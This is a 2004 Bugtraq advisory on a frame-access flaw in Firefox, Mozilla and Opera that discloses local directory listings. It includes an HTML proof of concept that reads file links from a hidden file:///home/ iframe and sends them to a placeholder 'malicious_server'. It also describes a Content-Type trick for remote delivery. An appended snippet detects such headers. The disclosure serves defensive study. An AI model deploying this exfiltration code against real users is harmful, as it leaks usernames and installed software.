
Bugtraq mailing list archives
Disclosure of file system information in Mozilla Firefox and Opera Browser:
From: "Giovanni Delvecchio" <badpenguin79 () hotmail com>
Date: Wed, 01 Dec 2004 16:15:25 +0000
Title: Disclosure of file system information in Mozilla Firefox and Opera Browser
Note: I don't know if it could really be considered a security problem; anyway, I'll try to explain my ideas.
Sorry for my bad English.

Author: Giovanni Delvecchio

Bug: Disclosure of file system information

Applications affected:
- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)
(maybe also previous versions)

Tested versions:
- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51, ..., 7.54 on Linux

Note: The content of this advisory could also apply to other browsers; I have checked just Mozilla, Firefox, Opera and Microsoft Internet Explorer.
Microsoft Internet Explorer seems not to be affected.

Bug Description:
================
A problem exists in some browsers where a frame can gain access to attributes of another frame or iframe.
An application of this bug could be the possibility to disclose the local directory structure.

PoC:
===
------ begin code.htm -----
<html>
<body onLoad="
  list_files='';
  for(i=0;i<local_files.document.links.length;i++) {
    list_files+=local_files.document.links.item(i);
  }
  alert(list_files);
  // send list_files to malicious_server
  document.location.href='http://malicious_server/grab.php?list='+list_files;
">
<iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>
------ end of code.htm -------

Impact:
======
A malicious server could obtain the content of the /home/ directory (or C:\Documents and Settings\ on Windows systems) and so learn a set of usernames present on the target system.
Moreover, it could be possible to know whether a particular program is installed on the target system, for a successive attack.
Anyway, it cannot be exploited "directly" by a remote site, but only if the page is opened from a local path (file://localpath/code.htm), since the iframe "local_files" belongs to a local domain.
Note: with Internet Explorer, code.htm doesn't work even locally.

Possible Remote Exploitation:
========================
Question: How could a malicious remote user exploit it?
Answer: After the "victim" user has requested http://malicious_server/code.htm, if malicious_server responds with a page containing an unknown Content-Type field (for example "text/html.", note the dot), the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" to view this page, it will be downloaded and opened locally; the JavaScript code will be executed in the local context.
Obviously, if the user chooses to save and then opens it, the result is the same.
(*) For Opera this method of remote exploitation requires that Opera be set as the Default Application in "handler for saved files" when the user chooses "Open" in the dialog window.

Solution:
========
No solution at the moment.

Vendor notice
==============
24th November 2004: I have contacted Mozilla at security () mozilla org and Opera through its bug tracker page at https://bugs.opera.com/wizard/
No response from either at the moment.

Best regards,
Giovanni Delvecchio
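The remote exploitation path above relies on a response whose Content-Type the browser does not recognise, so that it offers the open/save dialog instead of rendering. The following is an added example, not code from the advisory or from any vendor: a proxy-side or log-review check that flags such responses. The allowlist of inline media types and the sample header lines are assumptions constructed for the example.

```javascript
// Added example (not from the advisory): flag responses whose Content-Type is
// malformed or not a media type the site is expected to serve inline. The
// trigger "text/html." is syntactically valid (RFC 2616 tokens allow '.'),
// so a grammar check alone misses it; the allowlist does not.

const SEPARATORS = new Set('()<>@,;:\\"/[]?={} \t');

// RFC 2616 token: one or more characters that are neither CTLs nor separators.
function isToken(s) {
  return s.length > 0 && [...s].every((ch) =>
    ch.charCodeAt(0) > 31 && ch.charCodeAt(0) < 127 && !SEPARATORS.has(ch));
}

// Parse "type/subtype; name=value ..." into its parts, or null if malformed
// (parameter values are kept as written; a quoted ';' inside them is not handled).
function parseMediaType(value) {
  const [mediaType, ...paramParts] = value.split(';').map((p) => p.trim());
  const [type, subtype, extra] = mediaType.toLowerCase().split('/');
  if (extra !== undefined || !isToken(type) || !isToken(subtype || '')) return null;
  const params = {};
  for (const p of paramParts.filter((p) => p !== '')) {
    const eq = p.indexOf('=');
    if (eq < 1 || !isToken(p.slice(0, eq).trim())) return null;
    params[p.slice(0, eq).trim().toLowerCase()] = p.slice(eq + 1).trim();
  }
  return { type, subtype, params };
}

// Assumed allowlist: media types this site is expected to serve inline.
const EXPECTED_INLINE = new Set(['text/html', 'text/plain', 'text/css',
  'application/javascript', 'application/json', 'image/png', 'image/gif']);

// Return every Content-Type value among the header lines that is malformed or
// not on the allowlist; each is a candidate for an alert.
function findSuspiciousContentTypes(headerLines) {
  const out = [];
  for (const line of headerLines) {
    const m = /^content-type:\s*(.*)$/i.exec(line);
    if (!m) continue;
    const parsed = parseMediaType(m[1]);
    if (!parsed || !EXPECTED_INLINE.has(`${parsed.type}/${parsed.subtype}`)) {
      out.push(m[1].trim());
    }
  }
  return out;
}
// Constructed sample header lines (not captured traffic).
const SAMPLE_HEADERS = ['HTTP/1.1 200 OK', 'Content-Type: text/html; charset=utf-8',
  'Content-Type: text/html.', 'Content-Type: application/x-unknown-thing'];
console.log(findSuspiciousContentTypes(SAMPLE_HEADERS)); // the two unexpected values
```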
Current thread:
- Disclosure of file system information in Mozilla Firefox and Opera Browser: Giovanni Delvecchio (Dec 01)
- <Possible follow-ups>
- RE: Disclosure of file system information in Mozilla Firefox and Opera Browser: Thor Larholm (Dec 07)
